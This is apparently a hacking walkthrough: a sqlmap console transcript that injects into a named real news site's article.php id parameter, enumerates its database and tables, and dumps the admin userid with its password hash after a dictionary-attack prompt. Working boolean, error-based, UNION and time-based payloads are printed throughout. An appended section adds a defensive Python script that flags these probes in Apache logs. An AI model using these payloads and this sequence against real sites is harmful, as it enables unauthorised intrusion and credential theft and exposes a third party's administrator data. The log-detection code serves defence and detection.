D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user /* note: get the name of the current database user
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user: 'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db /* current database
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database: 'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost" /* get the table names of the current database
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /* get the column names of the admin table
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /* get the contents of those columns
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>
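Every probe sqlmap sent in the sessions above also landed in the target's Apache access log, and the four technique types it reported (boolean-based blind, error-based, UNION query, time-based blind) each have a recognisable shape in the request URI. The script below is an added example, not part of the original post or of sqlmap itself: it parses Apache combined-format log lines, URL-decodes the request, expands MySQL `CHAR(...)` literals (sqlmap's `CHAR(58,99,118,120,58)` is just the marker `:cvx:` it searches for in the response), and reports which source addresses sent which probe types. The log lines, addresses and timestamps are constructed for the demo; the payload strings are the ones printed in the transcript.

```python
"""Flag sqlmap-style SQL injection probes in Apache access-log lines.

Added example (not from the original post). Signatures match the four
techniques listed in the sqlmap output above; sample log lines below are
constructed for the demonstration.
"""
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import unquote_plus

# Apache "combined" format: ip ident user [time] "method uri proto" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# One regex per technique, keyed by the name sqlmap prints in its report.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)\s*=\s*\1\b", re.I),        # AND 799=799
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*?GROUP\s+BY", re.I | re.S),
    "UNION query": re.compile(r"UNION\s+(?:ALL\s+)?SELECT\b.*\bNULL\b", re.I | re.S),
    "time-based blind": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),          # AND SLEEP(5)
}
CHAR_CALL = re.compile(r"CHAR\(((?:\d+\s*,\s*)*\d+)\)", re.I)

# Constructed sample log (203.0.113.0/24 and 198.51.100.0/24 are documentation ranges).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2011:16:53:54 +0800] "GET /article.php?id=276%20AND%20799=799 HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
    '203.0.113.5 - - [01/Jan/2011:16:53:54 +0800] "GET /article.php?id=276%20AND%20(SELECT%208404%20FROM(SELECT%20COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT%20(CASE%20WHEN%20(8404=8404)%20THEN%201%20ELSE%200%20END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x%20FROM%20information_schema.tables%20GROUP%20BY%20x)a) HTTP/1.1" 200 5301 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
    '203.0.113.5 - - [01/Jan/2011:16:53:55 +0800] "GET /article.php?id=-8474%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65)%20AS%20CHAR),CHAR(32)),CHAR(58,110,99,118,58)),NULL,NULL,NULL%23 HTTP/1.1" 200 5140 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
    '203.0.113.5 - - [01/Jan/2011:16:53:55 +0800] "GET /article.php?id=276%20AND%20SLEEP(5) HTTP/1.1" 200 5120 "-" "sqlmap/0.9 (http://sqlmap.sourceforge.net)"',
    '198.51.100.7 - - [01/Jan/2011:16:54:02 +0800] "GET /article.php?id=276 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    'this line is deliberately malformed and must be skipped',
]


def decode_char_calls(text: str) -> str:
    """Replace MySQL CHAR(n,n,...) calls with the string they encode.

    sqlmap emits these so that no quote character appears in the request;
    CHAR(58,99,118,120,58) decodes to ':cvx:', the delimiter it later looks
    for in the response to cut out the extracted value.
    """
    return CHAR_CALL.sub(
        lambda m: "".join(chr(int(n)) for n in re.split(r"\s*,\s*", m.group(1))),
        text,
    )


def classify_request(uri: str) -> List[str]:
    """Return the sqlmap technique names whose signature appears in the URI."""
    decoded = decode_char_calls(unquote_plus(uri))
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]


def scan_log(lines) -> List[Tuple[str, str, List[str], str]]:
    """Return (ip, uri, techniques, user_agent) for each line that looks like a probe."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skip rather than abort the whole scan
        techniques = classify_request(m.group("uri"))
        # A sqlmap User-Agent alone is worth flagging, even if the probe shape is new.
        if techniques or m.group("ua").lower().startswith("sqlmap"):
            hits.append((m.group("ip"), m.group("uri"), techniques, m.group("ua")))
    return hits


def suspicious_sources(lines) -> Dict[str, Set[str]]:
    """Group probe techniques by source address, for blocking or alert triage."""
    by_ip: Dict[str, Set[str]] = {}
    for ip, _uri, techniques, _ua in scan_log(lines):
        by_ip.setdefault(ip, set()).update(techniques)
    return by_ip


if __name__ == "__main__":
    for ip, techniques in suspicious_sources(SAMPLE_LOG).items():
        print(f"{ip}: {', '.join(sorted(techniques)) or 'sqlmap user-agent only'}")
```

Run against a real log with `scan_log(open("access.log"))`; a single client cycling through all four technique types within seconds, as the sample does, is the pattern worth alerting on, whereas a lone `AND 1=1` can come from ordinary fuzzing or even legitimate traffic.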